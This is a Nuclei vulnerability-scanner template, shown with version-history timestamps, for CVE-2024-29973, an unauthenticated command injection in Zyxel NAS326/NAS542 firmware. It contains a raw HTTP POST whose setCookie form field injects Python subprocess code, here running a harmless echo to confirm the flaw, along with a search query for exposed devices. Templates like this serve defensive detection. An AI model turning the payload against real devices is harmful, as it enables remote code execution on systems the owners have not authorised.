nuclei-templates/http/cves/2024/CVE-2024-29973.yaml

52 lines
2.0 KiB
YAML
Raw Permalink Normal View History

2024-06-19 06:22:08 +00:00
id: CVE-2024-29973
info:
2024-06-19 13:11:25 +00:00
name: Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - Command Injection
2024-06-19 06:22:08 +00:00
author: ritikchaddha
severity: critical
description: |
The command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.
reference:
- https://outpost24.com/blog/zyxel-nas-critical-vulnerabilities/
- https://x.com/sirifu4k1/status/1803267896656929099/photo/1
- https://nvd.nist.gov/vuln/detail/CVE-2024-29973
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.88
cve-id: CVE-2024-29973
cwe-id: CWE-78
epss-score: 0.96901
epss-percentile: 0.9971
cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:*
metadata:
2024-06-19 13:11:25 +00:00
verified: true
2024-06-19 06:22:08 +00:00
max-request: 1
vendor: zyxel
product: nas326_firmware
2024-06-19 13:11:25 +00:00
fofa-query: app="ZYXEL-NAS326"
tags: cve,cve2024,zyxel,rce,intrusive
variables:
string: "{{randstr}}"
2024-06-19 06:22:08 +00:00
http:
- raw:
- |
2024-06-19 13:11:25 +00:00
POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
2024-06-19 06:22:08 +00:00
Host: {{Hostname}}
2024-06-19 13:11:25 +00:00
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="c0"
storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("echo {{string}}", shell=True)#
------WebKitFormBoundarygcflwtei--
2024-06-19 06:22:08 +00:00
matchers:
2024-06-19 11:12:01 +00:00
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, 'errmsg0\": \"OK')"
- "contains(header, 'application/json')"
2024-06-19 13:11:25 +00:00
- "contains(body, '{{string}}')"
2024-06-19 11:12:01 +00:00
condition: and
# digest: 490a00463044022049181be120d1349aec1b0334e173bea723ccde8f661094dd301df6a3934e0cce022047da4d0360d5e747e56c1bf4518b1de78d04716a4170e162b3f5c2d65f5df088:922c64590222798bb761d5b6d8e72950